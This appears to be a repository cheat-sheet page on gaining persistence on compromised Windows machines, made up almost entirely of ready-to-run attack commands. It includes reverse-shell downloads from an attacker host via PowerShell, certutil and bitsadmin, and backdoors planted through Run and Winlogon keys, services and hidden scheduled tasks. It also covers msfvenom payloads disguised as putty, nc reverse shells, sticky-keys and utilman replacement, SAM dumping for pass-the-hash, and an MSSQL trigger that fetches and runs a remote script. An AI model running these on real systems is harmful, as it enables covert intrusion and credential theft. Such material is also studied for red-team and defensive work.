whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Persistence/persistence.md

9.9 KiB
Raw Blame History

Persistence

  • Gain through
    • Startup folder persistence
    • Editing registry keys
    • Scheduled tasks
    • SUID
    • BITS
    • Creating a backdoored service
    • Creat user
    • RDP

Gain Persistence on Windows

Internet Explorer

Open the Internet Explorer Browser and add a malicious URL to trusted sites. The now trusted URLs could be shell or any other file that can be downloaded via the browser now.

Powershell

Open Powershell and download the reverse shell via

Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe

CMD.exe

Open cmd.exe and download the reverse shell via

certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
  • In Metasploit use multi/handler on attacker and set PAYLOAD windows/meterpreter/reverse_tcp

Paths to Persistence

  • Put in startup directory
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Put the reverse shell into %appdata% and add a registry key
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe"

Background Intelligence Transfer Service (BITS)

BITS is a background process included in Windows to transfer data (files) between machines while the system is on idle. The bitsadmin can be used directly via Powershell or cmd.exe to transfer malicious files.

bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"

bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume

Elevate Privileges

Create user net user /add <user> <pass>. Add the user to the administrators group via net localgroup administrators <user> /add. Assert the result via net localgroup Administrator

More stealthy methods

Backup Operator group is more stealthy method than using the administrators group. The following two groups are assigned through membership of Backup Operators

  • SeBackupPrivilege, read files
  • SeRestorePrivilege, write files
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add

RDP

An RDP login gets special treatment. Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

Afterwards, check if Backup Operators is enabled via whoami /groups. Backup SAM and SYSTEM via

reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL

Found hashes inside the dump can be used to Pass-the-hash via evil-winrm

secedit

  • Get r/w on files through editing a config file
  • Export secedit and open it
secedit /export /cfg config.inf
  • Add user to the groups
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
  • Convert the file
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
  • Add the user to the RDP group via net localgroup like before or do
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
  • Add & Click user -> Full Control(All Operations)
  • Set LocalAccountTokenFilterPolicy to 1 like in the section before

Relative ID (RID)

  • UID like in linux
    • Administrator has RID = 500
    • Other interactive users RID >= 1000
  • Get RIDs
 wmic useraccount get name,sid
  • Assign 500 to regular user
 PsExec64.exe -i -s regedit
  • Open HKLM\SAM\SAM\Domains\Account\Users\<0xRID>
  • Search for RID value as hexadecimal value
  • Open the key called F and change effective RID at position 0x30
  • Insert LE hex of 0d500, which is f401

Add to registry

  • Execute on user logon via
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f

Add a Service

Meterpreter

  • Inside meterpreter load powershell and powershell_shell
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"

Powershell

  • Start a service automatically
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
  • Use a service PE instead
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
  • Modify an existing service
    • Enumerate all the services
sc.exe query state=all

* Info about a specific service, start type should be automatic, service start name should be target user

sc.exe qc <ServiceName>

* Reconfigure

sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService

Add Scheduled Task

$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
  • Alternatively via schtasks
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM

* Check task

schtasks /query /tn SteamUpdater
  • Deleting Security Descriptor of a task to make it invisible. Delete the following key
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD

File Backdoor

Mimic PE

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe

Reference Script

  • Recycle shortcut of an app to reference a reverse shell script
    • Right click -> Properties -> Target
  • Reference the the script certainlynobackdoor.ps1 via
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
  • Content of the script certainlynobackdoor.ps1
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe

File Association

  • Change associated ProgID of a file type inside registry HKLM\Software\Classes\
  • Choose a class and <class>/shell/open/command contains the file to be opened as the first argument %1
  • Chang the argument to a shell script and pass the arg through it
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
  • Change command\default to powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1

Persistence via Logon

Startup directories

  • Users' Startup directory under
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Startup directory for all users, put the reverse shell here
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Registry Keys

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run

  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

  • Create Expandable String Value under any of this keys with the value of the reverse shell path

  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ loads user profile after authentication is done

    • Either shell or Userinit can be appended with a comma separated command

Logon Scripts

  • userinit.exe checks var UserInitMprLogonScript which cann be used to load logon scripts

  • Create variable UserInitMprLogonScript under HKCU\Environment which gets the reverse shell as a payload

RDP or Login Screen

Sticky Keys

  • Press shift x 5 and C:\Windows\System32\sethc.exe will be executed
  • Take ownership of the binary via
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
  • Overwrite with cmd.exe
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Utilman

  • Ease of access button is clickable at the login screen, it is executed with system privileges
  • Take ownership and overwrite with cmd.exe
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

Web Shell

  • Default user is iis apppool\defaultapppool

  • Has SeImpersonatePrivilege

  • Download Web Shell

  • Move shell to C:\inetpub\wwwroot on target

  • Get the shell via http://$TARGET_IP/shell.aspx

MSSQL

  • Triggers bind actions such as INSERTs

  • Open Microsoft SQL Server Management Studio

    • Choose windows auth
    • New Query
    • Enable Advance Options via
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO

* Grant privileges to all users

USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];

* Change to DB

USE <DATABASE>

* Create trigger

CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
  • Trigger the trigger by visiting the site which triggers the trigger through a db call